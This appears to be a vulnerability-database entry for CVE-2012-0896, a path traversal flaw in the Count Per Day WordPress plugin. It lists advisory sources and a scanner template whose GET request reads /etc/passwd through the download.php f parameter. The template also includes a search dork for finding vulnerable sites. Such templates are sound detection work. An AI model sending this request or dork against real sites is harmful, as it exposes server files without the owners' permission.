| Title | Published | Views | Reporter |
|---|---|---|---|
| CVE-2012-0896 | 12 Jan 2012 00:00 | – | circl |
| CVE-2012-0896 | 20 Jan 2012 17:00 | – | cve |
| CVE-2012-0896 | 20 Jan 2012 17:00 | – | cvelist |
| EUVD-2012-0919 | 7 Oct 2025 00:30 | – | euvd |
| CVE-2012-0896 | 20 Jan 2012 17:55 | – | nvd |
| WordPress Multiple Plugins / Themes Directory Traversal / File Download Vulnerability (HTTP) | 20 Nov 2020 00:00 | – | openvas |
| Path traversal | 20 Jan 2012 17:55 | – | prion |
| Count Per Day <= 3.1 - download.php f Parameter Traversal Arbitrary File Access | 1 Aug 2014 00:00 | – | wpvulndb |

```yaml
id: CVE-2012-0896

info:
  name: Count Per Day <= 3.1 - download.php f Parameter Traversal Arbitrary File Access
  author: daffainfo
  severity: medium
  description: An absolute path traversal vulnerability in download.php in the Count Per Day module before 3.1.1 for WordPress allows remote attackers to read arbitrary files via the f parameter.
  impact: |
    An attacker can exploit this vulnerability to read sensitive files on the server, potentially leading to unauthorized access, data leakage, or further compromise of the system.
  remediation: |
    Upgrade to a patched version of the Count Per Day plugin (version 3.2 or above) or apply the vendor-supplied patch to fix the path traversal vulnerability.
  reference:
    - https://packetstormsecurity.com/files/108631/
    - http://plugins.trac.wordpress.org/changeset/488883/count-per-day
    - https://nvd.nist.gov/vuln/detail/CVE-2012-0896
    - http://wordpress.org/extend/plugins/count-per-day/changelog/
    - https://exchange.xforce.ibmcloud.com/vulnerabilities/72385
  classification:
    cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N
    cvss-score: 5
    cve-id: CVE-2012-0896
    cwe-id: CWE-22
    epss-score: 0.00827
    epss-percentile: 0.74931
    cpe: cpe:2.3:a:count_per_day_project:count_per_day:2.2:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: count_per_day_project
    product: count_per_day
    google-query: inurl:"/wp-content/plugins/count-per-day"
  tags: cve,cve2012,packetstorm,lfi,wordpress,wp-plugin,traversal,count_per_day_project,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/wp-content/plugins/count-per-day/download.php?n=1&f=/etc/passwd"

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200
# digest: 490a0046304402203d0fc303ede7460b33941e9c992b6d57dde7fccc00cfa99a8e391837067b92250220341be7895c9c909d6783c6295f52afa2bf2707047a4ae1f3dbe2fe21826221cc:922c64590222798bb761d5b6d8e72950
```